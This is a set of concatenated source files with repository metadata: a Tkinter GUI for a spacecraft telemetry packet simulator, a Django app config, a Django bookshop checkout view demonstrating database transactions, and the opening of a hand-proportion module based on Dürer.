# --- filler ---
filler = tkinter.Label(self)
self.appGrid(filler, row=12, columnspan=3, rowweight=0)
# ---------------------------------------------------------------------------
def update(self, tmPktDef):
"""Update the packet fields"""
# fetch the data
pktName = ""
pktDescr = ""
pktSPID = ""
pktAPID = ""
pktType = ""
pktSType = ""
pktPI1val = ""
pktPI2val = ""
tmParamExtractions = []
if tmPktDef != None:
pktName = tmPktDef.pktName
pktDescr = tmPktDef.pktDescr
pktSPID = tmPktDef.pktSPID
pktAPID = tmPktDef.pktAPID
pktType = tmPktDef.pktType
pktSType = tmPktDef.pktSType
if tmPktDef.pktPI1val != None:
pktPI1val = tmPktDef.pktPI1val
if tmPktDef.pktPI2val != None:
pktPI2val = tmPktDef.pktPI2val
tmParamExtractions = tmPktDef.getParamExtractions()
# write the data into the GUI
self.pktNameField.set(pktName)
self.pktDescrField.set(pktDescr)
self.pktSPIDfield.set(pktSPID)
self.pktAPIDfield.set(pktAPID)
self.pktTypeField.set(pktType)
self.pktSubtypeField.set(pktSType)
self.pktPI1field.set(pktPI1val)
self.pktPI2field.set(pktPI2val)
lrow = 0
self.parametersListbox.list().delete(0, tkinter.END)
for tmParamExtraction in tmParamExtractions:
if tmParamExtraction.piValue:
continue
text = tmParamExtraction.name + " ---> " + tmParamExtraction.descr
self.parametersListbox.list().insert(lrow, text)
lrow += 1
# =============================================================================
class TMpacketBrowser(simpledialog.Dialog, UI.TKI.AppGrid):
"""Browser for TM packets"""
# ---------------------------------------------------------------------------
def __init__(self, master, title, prompt=""):
"""Read the MIB for obtaining the initialisation data"""
# initialise the dialog
self.prompt = prompt
self.listboxCurrent = None
self.afterID = None
simpledialog.Dialog.__init__(self, master, title=title)
if self.afterID != None:
self.after_cancel(self.afterID)
# ---------------------------------------------------------------------------
def body(self, master):
"""Intialise the dialog"""
row=0
if self.prompt != "":
label = tkinter.Label(master, text=self.prompt)
label.grid(row=row, column=0, columnspan=4)
row += 1
label = tkinter.Label(master)
label.grid(row=row, column=0, columnspan=4)
row += 1
# scrolled list box
self.slistbox = UI.TKI.ScrolledListbox(master, selectmode=tkinter.SINGLE)
self.appGrid(self.slistbox, row=row, column=0, columnweight=1)
lrow = 0
for tmPktDef in SPACE.IF.s_definitions.getTMpktDefs():
packetName = tmPktDef.pktName
self.insertListboxRow(lrow, packetName)
lrow += 1
self.pollListbox()
# details
self.details = TMpacketDetails(master)
self.appGrid(self.details, row=row, column=1, columnweight=0)
# ---------------------------------------------------------------------------
def insertListboxRow(self, row, text):
"""Inserts a row into self.slistbox"""
self.slistbox.list().insert(row, text)
# ---------------------------------------------------------------------------
def listboxHasChanged(self, pos):
"""Callback when the selection of self.slistbox has been changed"""
if pos != None:
# display the packet data
tmPktDef = SPACE.IF.s_definitions.getTMpktDefByIndex(pos)
self.details.update(tmPktDef)
# ---------------------------------------------------------------------------
def pollListbox(self):
"""Polls if the selection of self.slistbox has been changed"""
now = self.slistbox.list().curselection()
if now != self.listboxCurrent:
if len(now) > 0:
self.listboxHasChanged(int(now[0]))
else:
self.listboxHasChanged(None)
self.listboxCurrent = now
self.afterID = self.after(250, self.pollListbox)
# ---------------------------------------------------------------------------
def apply(self):
"""Callback when the OK button is pressed"""
packetName = self.details.pktNameField.get()
if packetName != "":
paramNames = self.details.parameterNamesField.get()
paramValues = self.details.parameterValuesField.get()
self.result = [packetName, paramNames, paramValues]
# =============================================================================
class GUIview(UI.TKI.GUItabView):
"""Implementation of the SIM Space GUI layer"""
# ---------------------------------------------------------------------------
def __init__(self, master):
"""Initialise all GUI elements"""
UI.TKI.GUItabView.__init__(self, master, "SPACE", "Space Segment")
# menu buttons
self.menuButtons = UI.TKI.MenuButtons(self,
[["PKT", self.setPacketDataCallback, COLOR_BUTTON_FG, COLOR_BUTTON_BG, tkinter.DISABLED],
["SND", self.sendPacketCallback, COLOR_BUTTON_FG, COLOR_BUTTON_BG, tkinter.DISABLED],
["ACK", self.sendAckCallback, COLOR_BUTTON_FG, COLOR_BUTTON_BG, tkinter.DISABLED],
["RPLY", self.replayPacketsCallback, COLOR_BUTTON_FG, COLOR_BUTTON_BG, tkinter.DISABLED],
["LIST", self.listPacketsCallback, COLOR_BUTTON_FG, COLOR_BUTTON_BG],
["GEN", self.generateCallback, COLOR_BUTTON_FG, COLOR_BUTTON_BG]])
self.appGrid(self.menuButtons,
row=0,
columnspan=2,
rowweight=0,
sticky=tkinter.EW)
# checkbuttons
self.checkButtons = UI.TKI.Checkbuttons(self,
[["TM", self.cyclicCallback, False, COLOR_ON_OK],
["ACK1", self.ack1Callback, True, COLOR_ON_OK],
["NAK1", self.nak1Callback, False, COLOR_ON_NOK],
["ACK2", self.ack2Callback, True, COLOR_ON_OK],
["NAK2", self.nak2Callback, False, COLOR_ON_NOK],
["ACK3", self.ack3Callback, True, COLOR_ON_OK],
["NAK3", self.nak3Callback, False, COLOR_ON_NOK],
["ACK4", self.ack4Callback, True, COLOR_ON_OK],
["NAK4", self.nak4Callback, False, COLOR_ON_NOK]])
self.appGrid(self.checkButtons,
row=1,
columnspan=2,
rowweight=0,
columnweight=0,
sticky=tkinter.W)
# tm status
self.tmStatusField = UI.TKI.ValueField(self, row=2, label="TM status:")
self.tmStatusField.set("INIT")
self.tmStatusField.setBackground(COLOR_INITIALISED)
# packet
self.packetField = UI.TKI.ValueField(self, row=3, label="Packet:")
# SPID
self.spidField = UI.TKI.ValueField(self, row=4, label="SPID:")
# parameter values
self.parameterValuesField = UI.TKI.ValueField(self, row=5, label="Parameters and values:")
# replay TM packets
self.replayTMpacketsField = UI.TKI.ValueField(self, row=6, label="Replay TM packets:")
# log messages
self.messageLogger = UI.TKI.MessageLogger(self, "SPACE")
self.appGrid(self.messageLogger, row=7, columnspan=2)
# message line
self.messageline = tkinter.Message(self, relief=tkinter.GROOVE)
self.appGrid(self.messageline,
row=8,
columnspan=2,
rowweight=0,
columnweight=0,
sticky=tkinter.EW)
self.grid(row=0, column=0, sticky=tkinter.EW+tkinter.NS)
self.master.rowconfigure(0, weight=1)
self.master.columnconfigure(0, weight=1)
# ---------------------------------------------------------------------------
def fillCommandMenuItems(self):
"""
fill the command menu bar,
implementation of UI.TKI.GUItabView.fillCommandMenuItems
"""
self.addCommandMenuItem(label="SetPacketData", command=self.setPacketDataCallback, enabled=False)
self.addCommandMenuItem(label="SendPacket", command=self.sendPacketCallback, enabled=False)
self.addCommandMenuItem(label="EnableCyclic", command=self.enableCyclicCallback)
self.addCommandMenuItem(label="DisableCyclic", command=self.disableCyclicCallback, enabled=False)
self.addCommandMenuItem(label="OBCenableAck1", command=self.obcEnableAck1Callback, enabled=False)
self.addCommandMenuItem(label="OBCenableNak1", command=self.obcEnableNak1Callback)
self.addCommandMenuItem(label="OBCdisableAck1", command=self.obcDisableAck1Callback)
self.addCommandMenuItem(label="OBCenableAck2", command=self.obcEnableAck2Callback, enabled=False)
self.addCommandMenuItem(label="OBCenableNak2", command=self.obcEnableNak2Callback)
self.addCommandMenuItem(label="OBCdisableAck2", command=self.obcDisableAck2Callback)
self.addCommandMenuItem(label="OBCenableAck3", command=self.obcEnableAck3Callback, enabled=False)
self.addCommandMenuItem(label="OBCenableNak3", command=self.obcEnableNak3Callback)
self.addCommandMenuItem(label="OBCdisableAck3", command=self.obcDisableAck3Callback)
self.addCommandMenuItem(label="OBCenableAck4", command=self.obcEnableAck4Callback, enabled=False)
self.addCommandMenuItem(label="OBCenableNak4", command=self.obcEnableNak4Callback)
self.addCommandMenuItem(label="OBCdisableAck4", command=self.obcDisableAck4Callback)
self.addCommandMenuItem(label="SendAck", command=self.sendAckCallback, enabled=False)
self.addCommandMenuItem(label="ReplayPackets", command=self.replayPacketsCallback, enabled=False)
self.addCommandMenuItem(label="ListPackets", command=self.listPacketsCallback)
self.addCommandMenuItem(label="Generate", command=self.generateCallback)
# ---------------------------------------------------------------------------
def setPacketDataCallback(self):
"""Called when the SetPacketData menu entry is selected"""
# do the dialog
dialog = TMpacketBrowser(self,
title="Set Packet Data Dialog",
prompt="Please select a packet and enter virtual channel and parameter name/values.")
if dialog.result != None:
packetName, paramNames, paramValues = dialog.result
if paramNames == "" or paramValues == "":
self.notifyModelTask(["SETPACKETDATA", packetName])
else:
self.notifyModelTask(["SETPACKETDATA", packetName, paramNames, paramValues])
# ---------------------------------------------------------------------------
def sendPacketCallback(self):
"""Called when the SendPacket menu entry is selected"""
self.notifyModelTask(["SENDPACKET"])
# ---------------------------------------------------------------------------
def enableCyclicCallback(self):
"""Called when the EnableCyclic menu entry is selected"""
self.notifyModelTask(["ENABLECYCLIC"])
def disableCyclicCallback(self):
"""Called when the DisableCyclic menu entry is selected"""
self.notifyModelTask(["DISABLECYCLIC"])
def cyclicCallback(self):
"""Called when the TM checkbutton is pressed"""
if self.checkButtons.getButtonPressed("TM"):
self.notifyModelTask(["ENABLECYCLIC"])
else:
self.notifyModelTask(["DISABLECYCLIC"])
# ---------------------------------------------------------------------------
def obcEnableAck1Callback(self):
"""Called when the OBCenableAck1 menu entry is selected"""
self.notifyModelTask(["OBCENABLEACK1"])
def obcEnableNak1Callback(self):
"""Called when the OBCenableNak1 menu entry is selected"""
self.notifyModelTask(["OBCENABLENAK1"])
def obcDisableAck1Callback(self):
"""Called when the OBCdisableAck1 menu entry is selected"""
self.notifyModelTask(["OBCDISABLEACK1"])
def ack1Callback(self):
"""Called when the ACK1 checkbutton is pressed"""
if self.checkButtons.getButtonPressed("ACK1"):
self.notifyModelTask(["OBCENABLEACK1"])
else:
self.notifyModelTask(["OBCDISABLEACK1"])
def nak1Callback(self):
"""Called when the NAK1 checkbutton is pressed"""
if self.checkButtons.getButtonPressed("NAK1"):
self.notifyModelTask(["OBCENABLENAK1"])
else:
self.notifyModelTask(["OBCDISABLEACK1"])
# ---------------------------------------------------------------------------
def obcEnableAck2Callback(self):
"""Called when the OBCenableAck2 menu entry is selected"""
self.notifyModelTask(["OBCENABLEACK2"])
def obcEnableNak2Callback(self):
"""Called when the OBCenableNak2 menu entry is selected"""
self.notifyModelTask(["OBCENABLENAK2"])
def obcDisableAck2Callback(self):
"""Called when the OBCdisableAck2 menu entry is selected"""
self.notifyModelTask(["OBCDISABLEACK2"])
def ack2Callback(self):
"""Called when the ACK2 checkbutton is pressed"""
if self.checkButtons.getButtonPressed("ACK2"):
self.notifyModelTask(["OBCENABLEACK2"])
else:
self.notifyModelTask(["OBCDISABLEACK2"])
def nak2Callback(self):
"""Called when the NAK2 checkbutton is pressed"""
if self.checkButtons.getButtonPressed("NAK2"):
self.notifyModelTask(["OBCENABLENAK2"])
else:
self.notifyModelTask(["OBCDISABLEACK2"])
# ---------------------------------------------------------------------------
def obcEnableAck3Callback(self):
"""Called when the OBCenableAck3 menu entry is selected"""
self.notifyModelTask(["OBCENABLEACK3"])
def obcEnableNak3Callback(self):
"""Called when the OBCenableNak3 menu entry is selected"""
self.notifyModelTask(["OBCENABLENAK3"])
def obcDisableAck3Callback(self):
"""Called when the OBCdisableAck3 menu entry is selected"""
self.notifyModelTask(["OBCDISABLEACK3"])
def ack3Callback(self):
"""Called when the ACK3 checkbutton is pressed"""
if self.checkButtons.getButtonPressed("ACK3"):
self.notifyModelTask(["OBCENABLEACK3"])
else:
self.notifyModelTask(["OBCDISABLEACK3"])
def nak3Callback(self):
"""Called when the NAK3 checkbutton is pressed"""
if self.checkButtons.getButtonPressed("NAK3"):
self.notifyModelTask(["OBCENABLENAK3"])
else:
self.notifyModelTask(["OBCDISABLEACK3"])
# ---------------------------------------------------------------------------
def obcEnableAck4Callback(self):
"""Called when the OBCenableAck4 menu entry is selected"""
self.notifyModelTask(["OBCENABLEACK4"])
def obcEnableNak4Callback(self):
"""Called when the OBCenableNak4 menu entry is selected"""
self.notifyModelTask(["OBCENABLENAK4"])
def obcDisableAck4Callback(self):
"""Called when the OBCdisableAck4 menu entry is selected"""
self.notifyModelTask(["OBCDISABLEACK4"])
def ack4Callback(self):
"""Called when the ACK4 checkbutton is pressed"""
if self.checkButtons.getButtonPressed("ACK4"):
self.notifyModelTask(["OBCENABLEACK4"])
else:
self.notifyModelTask(["OBCDISABLEACK4"])
def nak4Callback(self):
"""Called when the NAK4 checkbutton is pressed"""
if self.checkButtons.getButtonPressed("NAK4"):
self.notifyModelTask(["OBCENABLENAK4"])
else:
self.notifyModelTask(["OBCDISABLEACK4"])
# ---------------------------------------------------------------------------
def sendAckCallback(self):
"""Called when the SendAck menu entry is selected"""
dialog = UI.TKI.InputDialog(master=self,
title="TC Acknowledgement",
prompt="Enter data for TC Acknowledgement Report (PUS service 1)",
fieldsSpec = [["InputField", "TC APID:"],
["InputField", "TC SSC:"],
["Radiobuttons", "Subtype 1 - Accept Success:|" +
"Subtype 2 - Accept Fail:|" +
"Subtype 3 - Exec Start Success:|" +
"Subtype 4 - Exec Start Fail:|" +
"Subtype 5 - Exec Proceed Success:|" +
"Subtype 6 - Exec Proceed Fail:|" +
"Subtype 7 - Exec Finish Success:|" +
"Subtype 8 - Exec Finish Fail:"]])
if dialog.result != None:
apidStr = dialog.result[0]
sscStr = dialog.result[1]
subtypeStr = str(dialog.result[2] + 1)
self.notifyModelTask(["SENDACK", apidStr, sscStr, subtypeStr])
# ---------------------------------------------------------------------------
def replayPacketsCallback(self):
"""Called when the ReplayPackets menu entry is selected"""
fileName = filedialog.askopenfilename(title="Open TM Packet Replay File",
initialdir=SCOS.ENV.s_environment.tmFilesDir())
if fileName != "" and fileName != ():
self.notifyModelTask(["REPLAYPACKETS", fileName])
# ---------------------------------------------------------------------------
def listPacketsCallback(self):
"""Called when the ListPackets menu entry is selected"""
# disable the button during generation,
# because generation could take some time
self.menuButtons.setState("LIST", tkinter.DISABLED)
self.notifyModelTask(["LISTPACKETS"])
self.menuButtons.setState("LIST", tkinter.NORMAL)
# ---------------------------------------------------------------------------
def generateCallback(self):
"""Called when the Generate menu entry is selected"""
# disable the button during generation,
# because generation could take some time
self.menuButtons.setState("GEN", tkinter.DISABLED)
self.notifyModelTask(["GENERATE"])
self.menuButtons.setState("GEN", tkinter.NORMAL)
# ---------------------------------------------------------------------------
def notifyStatus(self, status):
"""Generic callback when something changes in the model"""
if status == "TM_CONNECTED":
self.tmConnectedNotify()
elif status == "TM_RECORDING":
self.tmRecordingNotify()
elif status == "PACKETDATA_SET":
self.packetDataSetNotify()
elif status == "UPDATE_REPLAY":
self.updateReplayNotify()
elif status == "ENABLED_CYCLIC":
self.enabledCyclicNotify()
elif status == "DISABLED_CYCLIC":
self.disabledCyclicNotify()
elif status == "OBC_ENABLED_ACK1":
self.obcEnabledAck1Notify()
elif status == "OBC_ENABLED_NAK1":
self.obcEnabledNak1Notify()
elif status == "OBC_DISABLED_ACK1":
self.obcDisabledAck1Notify()
elif status == "OBC_ENABLED_ACK2":
self.obcEnabledAck2Notify()
elif status == "OBC_ENABLED_NAK2":
self.obcEnabledNak2Notify()
elif status == "OBC_DISABLED_ACK2":
self.obcDisabledAck2Notify()
elif status == "OBC_ENABLED_ACK3":
self.obcEnabledAck3Notify()
elif status == "OBC_ENABLED_NAK3":
self.obcEnabledNak3Notify()
elif status == "OBC_DISABLED_ACK3":
self.obcDisabledAck3Notify()
elif status == "OBC_ENABLED_ACK4":
self.obcEnabledAck4Notify()
elif status == "OBC_ENABLED_NAK4":
self.obcEnabledNak4Notify()
elif status == "OBC_DISABLED_ACK4":
self.obcDisabledAck4Notify()
elif status == "FRAME_REC_STARTED":
self.frameRecStarted()
elif status == "FRAME_REC_STOPPED":
self.frameRecStopped()
# ---------------------------------------------------------------------------
def tmConnectedNotify(self):
"""Called when the TM connect function is successfully processed"""
self.enableCommandMenuItem("SetPacketData")
self.enableCommandMenuItem("EnableCyclic")
self.enableCommandMenuItem("SendAck")
self.enableCommandMenuItem("ReplayPackets")
self.menuButtons.setState("PKT", tkinter.NORMAL)
self.menuButtons.setState("ACK", tkinter.NORMAL)
self.menuButtons.setState("RPLY", tkinter.NORMAL)
self.updateTMstatusField()
# ---------------------------------------------------------------------------
def packetDataSetNotify(self):
"""Called when the setPacketData function is successfully processed"""
self.enableCommandMenuItem("SendPacket")
self.menuButtons.setState("SND", tkinter.NORMAL)
self.updateTMstatusField()
self.packetField.set(SPACE.IF.s_configuration.tmPacketData.pktName)
self.spidField.set(SPACE.IF.s_configuration.tmPacketData.pktSPID)
nameValueStr = ""
for nameValue in SPACE.IF.s_configuration.tmPacketData.parameterValuesList:
if nameValueStr != "":
nameValueStr += ", "
nameValueStr += nameValue[0] + "=" + nameValue[1]
self.parameterValuesField.set(nameValueStr)
# ---------------------------------------------------------------------------
def updateReplayNotify(self):
"""Called when the replay state has changed"""
replayItems = SPACE.IF.s_tmPacketReplayer.getItems()
nrPackets = len(replayItems)
if nrPackets == 0:
txt = ""
else:
txt = str(nrPackets) + ": "
# item 0
item0 = replayItems[0]
itemType0, itemVal0 = item0
if itemType0 == SPACE.IF.RPLY_PKT:
txt += itemVal0.pktName
elif itemType0 == SPACE.IF.RPLY_RAWPKT:
txt += "raw"
elif itemType0 == SPACE.IF.RPLY_SLEEP:
txt += "sleep(" + str(itemVal0) + ")"
elif itemType0 == SPACE.IF.RPLY_OBT:
txt += "obt(" + UTIL.TIME.getASDtimeStr(itemVal0) + ")"
else:
txt += "ert(" + UTIL.TIME.getASDtimeStr(itemVal0) + ")"
# item 1
if nrPackets > 1:
item1 = replayItems[1]
itemType1, itemVal1 = item1
if itemType1 == SPACE.IF.RPLY_PKT:
txt += ", " + itemVal1.pktName
elif itemType1 == SPACE.IF.RPLY_RAWPKT:
txt += ", raw"
elif itemType1 == SPACE.IF.RPLY_SLEEP:
txt += ", sleep(" + str(itemVal1) + ")"
elif itemType1 == SPACE.IF.RPLY_OBT:
txt += ", obt(" + UTIL.TIME.getASDtimeStr(itemVal1) + ")"
else:
txt += ", ert(" + UTIL.TIME.getASDtimeStr(itemVal1) + ")"
# item 2
if nrPackets > 2:
item2 = replayItems[2]
itemType2, itemVal2 = item2
if itemType2 == SPACE.IF.RPLY_PKT:
txt += ", " + itemVal2.pktName
elif itemType2 == SPACE.IF.RPLY_RAWPKT:
txt += ", raw"
elif itemType2 == SPACE.IF.RPLY_SLEEP:
txt += ", sleep(" + str(itemVal2) + ")"
elif itemType2 == SPACE.IF.RPLY_OBT:
txt += ", obt(" + UTIL.TIME.getASDtimeStr(itemVal2) + ")"
else:
txt += ", ert(" + UTIL.TIME.getASDtimeStr(itemVal2) + ")"
if nrPackets > 3:
txt += ", ..."
self.replayTMpacketsField.set(txt)
# ---------------------------------------------------------------------------
def enabledCyclicNotify(self):
"""Called when the enableCyclic function is successfully processed"""
self.disableCommandMenuItem("EnableCyclic")
self.enableCommandMenuItem("DisableCyclic")
self.checkButtons.setButtonPressed("TM", True)
def disabledCyclicNotify(self):
"""Called when the disableCyclic function is successfully processed"""
self.enableCommandMenuItem("EnableCyclic")
self.disableCommandMenuItem("DisableCyclic")
self.checkButtons.setButtonPressed("TM", False)
# ---------------------------------------------------------------------------
def obcEnabledAck1Notify(self):
"""Called when the obcEnabledAck1 function is successfully processed"""
self.disableCommandMenuItem("OBCenableAck1")
self.enableCommandMenuItem("OBCenableNak1")
self.enableCommandMenuItem("OBCdisableAck1")
self.checkButtons.setButtonPressed("ACK1", True)
self.checkButtons.setButtonPressed("NAK1", False)
def obcEnabledNak1Notify(self):
"""Called when the obcEnabledNak1 function is successfully processed"""
self.enableCommandMenuItem("OBCenableAck1")
self.disableCommandMenuItem("OBCenableNak1")
self.enableCommandMenuItem("OBCdisableAck1")
self.checkButtons.setButtonPressed("ACK1", False)
self.checkButtons.setButtonPressed("NAK1", True)
def obcDisabledAck1Notify(self):
"""Called when the obcDisabledAck1 function is successfully processed"""
self.enableCommandMenuItem("OBCenableAck1")
self.enableCommandMenuItem("OBCenableNak1")
self.disableCommandMenuItem("OBCdisableAck1")
self.checkButtons.setButtonPressed("ACK1", False)
self.checkButtons.setButtonPressed("NAK1", False)
# ---------------------------------------------------------------------------
def obcEnabledAck2Notify(self):
"""Called when the obcEnabledAck2 function is successfully processed"""
self.disableCommandMenuItem("OBCenableAck2")
self.enableCommandMenuItem("OBCenableNak1")
self.enableCommandMenuItem("OBCdisableAck2")
self.checkButtons.setButtonPressed("ACK2", True)
self.checkButtons.setButtonPressed("NAK2", False)
def obcEnabledNak2Notify(self):
"""Called when the obcEnabledNak2 function is successfully processed"""
self.enableCommandMenuItem("OBCenableAck2")
self.disableCommandMenuItem("OBCenableNak2")
self.enableCommandMenuItem("OBCdisableAck2")
self.checkButtons.setButtonPressed("ACK2", False)
self.checkButtons.setButtonPressed("NAK2", True)
def obcDisabledAck2Notify(self):
"""Called when the obcDisabledAck2 function is successfully processed"""
self.enableCommandMenuItem("OBCenableAck2")
self.enableCommandMenuItem("OBCenableNak2")
self.disableCommandMenuItem("OBCdisableAck2")
self.checkButtons.setButtonPressed("ACK2", False)
self.checkButtons.setButtonPressed("NAK2", False)
# ---------------------------------------------------------------------------
def obcEnabledAck3Notify(self):
"""Called when the obcEnabledAck3 function is successfully processed"""
self.disableCommandMenuItem("OBCenableAck3")
self.enableCommandMenuItem("OBCenableNak3")
self.enableCommandMenuItem("OBCdisableAck3")
self.checkButtons.setButtonPressed("ACK3", True)
self.checkButtons.setButtonPressed("NAK3", False)
def obcEnabledNak3Notify(self):
"""Called when the obcEnabledNak3 function is successfully processed"""
self.enableCommandMenuItem("OBCenableAck3")
self.disableCommandMenuItem("OBCenableNak3")
self.enableCommandMenuItem("OBCdisableAck3")
self.checkButtons.setButtonPressed("ACK3", False)
self.checkButtons.setButtonPressed("NAK3", True)
def obcDisabledAck3Notify(self):
"""Called when the obcDisabledAck3 function is successfully processed"""
self.enableCommandMenuItem("OBCenableAck3")
self.enableCommandMenuItem("OBCenableNak3")
self.disableCommandMenuItem("OBCdisableAck3")
self.checkButtons.setButtonPressed("ACK3", False)
self.checkButtons.setButtonPressed("NAK3", False)
# ---------------------------------------------------------------------------
def obcEnabledAck4Notify(self):
"""Called when the obcEnabledAck4 function is successfully processed"""
self.disableCommandMenuItem("OBCenableAck4")
self.enableCommandMenuItem("OBCenableNak4")
self.enableCommandMenuItem("OBCdisableAck4")
self.checkButtons.setButtonPressed("ACK4", True)
self.checkButtons.setButtonPressed("NAK4", False)
def obcEnabledNak4Notify(self):
"""Called when the obcEnabledNak4 function is successfully processed"""
self.enableCommandMenuItem("OBCenableAck4")
self.disableCommandMenuItem("OBCenableNak4")
self.enableCommandMenuItem("OBCdisableAck4")
self.checkButtons.setButtonPressed("ACK4", False)
self.checkButtons.setButtonPressed("NAK4", True)
def obcDisabledAck4Notify(self):
"""Called when the obcDisabledAck4 function is successfully processed"""
self.enableCommandMenuItem("OBCenableAck4")
self.enableCommandMenuItem("OBCenableNak4")
self.disableCommandMenuItem("OBCdisableAck4")
self.checkButtons.setButtonPressed("ACK4", False)
self.checkButtons.setButtonPressed("NAK4", False)
# ---------------------------------------------------------------------------
def frameRecStarted(self):
"""Called when the recordFrames function is successfully processed"""
self.enableCommandMenuItem("SetPacketData")
self.enableCommandMenuItem("EnableCyclic")
self.enableCommandMenuItem("SendAck")
self.enableCommandMenuItem("ReplayPackets")
self.menuButtons.setState("PKT", tkinter.NORMAL)
self.menuButtons.setState("ACK", tkinter.NORMAL)
self.menuButtons.setState("RPLY", tkinter.NORMAL)
# ---------------------------------------------------------------------------
def frameRecStopped(self):
"""Called when the stopFrameRecorder function is successfully processed"""
if SPACE.IF.s_configuration.connected:
self.enableCommandMenuItem("SetPacketData")
self.enableCommandMenuItem("EnableCyclic")
self.enableCommandMenuItem("SendAck")
self.enableCommandMenuItem("ReplayPackets")
self.menuButtons.setState("PKT", tkinter.NORMAL)
self.menuButtons.setState("ACK", tkinter.NORMAL)
self.menuButtons.setState("RPLY", tkinter.NORMAL)
else:
self.disableCommandMenuItem("SetPacketData")
self.disableCommandMenuItem("EnableCyclic")
self.disableCommandMenuItem("SendAck")
self.disableCommandMenuItem("ReplayPackets")
self.menuButtons.setState("PKT", tkinter.DISABLED)
self.menuButtons.setState("ACK", tkinter.DISABLED)
self.menuButtons.setState("RPLY", tkinter.DISABLED)
# ---------------------------------------------------------------------------
def updateTMstatusField(self):
"""updated the TM status field depending on the SPACE.IF.s_configuration"""
if SPACE.IF.s_configuration.connected:
txt = "CONNECTED"
bgColor = COLOR_CONNECTED
else:
txt = "INIT"
if SPACE.IF.s_configuration.tmPacketData != None:
txt += " + PKT DEFINED"
self.tmStatusField.set(txt)
if SPACE.IF.s_configuration.connected:
self.tmStatusField.setBackground(bgColor)
| [
"korner-hajek@gmx.at"
] | korner-hajek@gmx.at |
c406b4d4d07c56181472196d7f7b8740fd478127 | 0896a02043513e5a04153d944d3696e06cbde719 | /test_app_api/apps.py | 5aad6833269b561d56834f31baede8f7bf1c87de | [
"MIT"
] | permissive | Satyam6024/test_rest_api | ccd7b66d9f13d04f75dbbc30c85cdfeb81029116 | 4e53e224b90eca330ed0d7d87530060722632b42 | refs/heads/master | 2023-07-09T01:34:38.817865 | 2021-08-08T18:35:02 | 2021-08-08T18:35:02 | 393,442,353 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 97 | py | from django.apps import AppConfig
class TestAppApiConfig(AppConfig):
name = 'test_app_api'
| [
"sss.sahusatyam2000@gmail.com"
] | sss.sahusatyam2000@gmail.com |
63a3e633e544e4a017474a3cba78a6c0a93f189b | 17070ea982156a8553c24e2ea3b687fb1dc5544e | /shop/views.py | 02cd002f7c32aecc9a6deff58f0d5b489658af0a | [] | no_license | akiyoko/django-concurrency-sample | 75353fe55e0376e08f2c888b5feb323f9728fc1a | 8b9fd1e04a034cb0d8e6d1915d864b13b1726608 | refs/heads/main | 2023-01-22T10:49:39.375878 | 2020-12-01T05:17:53 | 2020-12-01T05:17:53 | 317,429,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,840 | py | import logging
from django.contrib import messages
from django.contrib.auth import get_user_model
from django.db import transaction
# from django.http.response import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from django.template.response import TemplateResponse
from django.utils.decorators import method_decorator
from django.views import View
from .models import Book, BookStock, Order
logger = logging.getLogger(__name__)
User = get_user_model()
@method_decorator(transaction.non_atomic_requests, name='dispatch')
class CheckoutView(View):
def get(self, request, *args, **kwargs):
book = get_object_or_404(Book, pk=kwargs['pk'])
book_stock = get_object_or_404(BookStock, book=book)
if book_stock.quantity == 0:
messages.error(request, "在庫がないので購入できません。")
context = {
'book': book,
'book_stock': book_stock,
}
return TemplateResponse(request, 'shop/checkout.html', context)
def post(self, request, *args, **kwargs):
# # TODO: ログイン状態をシミュレート
# request.user = User(pk=1)
book = get_object_or_404(Book, pk=kwargs['pk'])
# 1) デフォルト
# 2) ATOMIC_REQUESTS を有効化
# # ① 注文情報を登録
# order = Order(
# status=Order.STATUS_PAYMENT_PROCESSING,
# total_amount=book.price,
# ordered_by=request.user,
# )
# order.save()
#
# # ② 在庫数を確認
# book_stock = get_object_or_404(BookStock, book=book)
# # ③ 在庫数を1減らして更新
# book_stock.quantity -= 1
# book_stock.save()
#
# # 決済処理
# try:
# print('決済処理')
# # TODO
# # raise Exception("決済処理で例外発生")
# except Exception as e:
# # 在庫を1つ増やして更新
# book_stock = get_object_or_404(BookStock, book=book)
# book_stock.quantity += 1
# book_stock.save()
#
# # 注文情報のステータスを更新
# order.status = Order.STATUS_PAYMENT_NG
# order.save()
#
# messages.error(request, "決済NGです。")
# return TemplateResponse(request, 'shop/checkout_error.html')
#
# # ④ 注文情報のステータスを更新
# order.status = Order.STATUS_PAYMENT_OK
# order.save()
# 3) transaction.atomic() で囲む
# 4) ATOMIC_REQUESTS を有効化しているときに、特定のメソッド内で自前でトランザクションを切る
with transaction.atomic():
# ① 注文情報を登録
order = Order(
status=Order.STATUS_PAYMENT_PROCESSING,
total_amount=book.price,
ordered_by=request.user,
)
order.save()
# ② 在庫数を確認
book_stock = get_object_or_404(BookStock, book=book)
# ③ 在庫数を1減らして更新
book_stock.quantity -= 1
book_stock.save()
# ...(決済処理)...
print('決済処理')
with transaction.atomic():
# ④ 注文情報のステータスを更新
order.status = Order.STATUS_PAYMENT_OK
order.save()
messages.info(request, "購入しました。")
if book_stock.quantity == 0:
messages.warning(request, "在庫がなくなりました。")
context = {
'book': book,
'book_stock': book_stock,
'order': order,
}
return TemplateResponse(request, 'shop/checkout.html', context)
| [
"akiyoko@users.noreply.github.com"
] | akiyoko@users.noreply.github.com |
0609c2c20e6cddc8222b725733cd1596ab193ac5 | b9e6f1f167556ff55d4f633a829c33f1239c999e | /umano/onehand/durer.py | c07254b854c6b24b1d1b0dfa437cebe3aca40adc | [] | no_license | fondazione-golinelli/u-mano | 50eeabc9ec79a88682b1bad0f3c2bf6dfbd5b656 | b2159a9c1cdf04cf87c018b5edace0f21202c484 | refs/heads/master | 2022-11-26T07:37:37.660356 | 2020-02-19T17:34:50 | 2020-02-19T17:34:50 | 211,079,378 | 0 | 0 | null | 2022-11-22T04:36:16 | 2019-09-26T12:05:19 | Max | UTF-8 | Python | false | false | 3,095 | py | import os
import cv2
from umano.onehand.utils import annotate_frame_with_features
def durerizer(LL):
L19 = LL / 19
C = LL
K = LL - L19 * 7
H = LL - L19 * 1.5
I = LL - L19 * 4
G = LL - L19 * 1
N = LL - L19 * 14
O = LL - L19 * 10
P = LL - L19 * 6
L = M = LL - L19 * 11
KN = abs(K - N)
CP = abs(C - P)
HL = abs(H - L)
KG = abs(K - G)
hand_width = L19 * 11
middle_finger_width = abs(M - C) / 5
index_finger_width = middle_finger_width * 4 / 5
points = [(0.0, 0.0)] * 21
# thumb
# il punto 1 non esiste in Durer, interpolo
points[2] = (-hand_width / 2 + KN / 4, N)
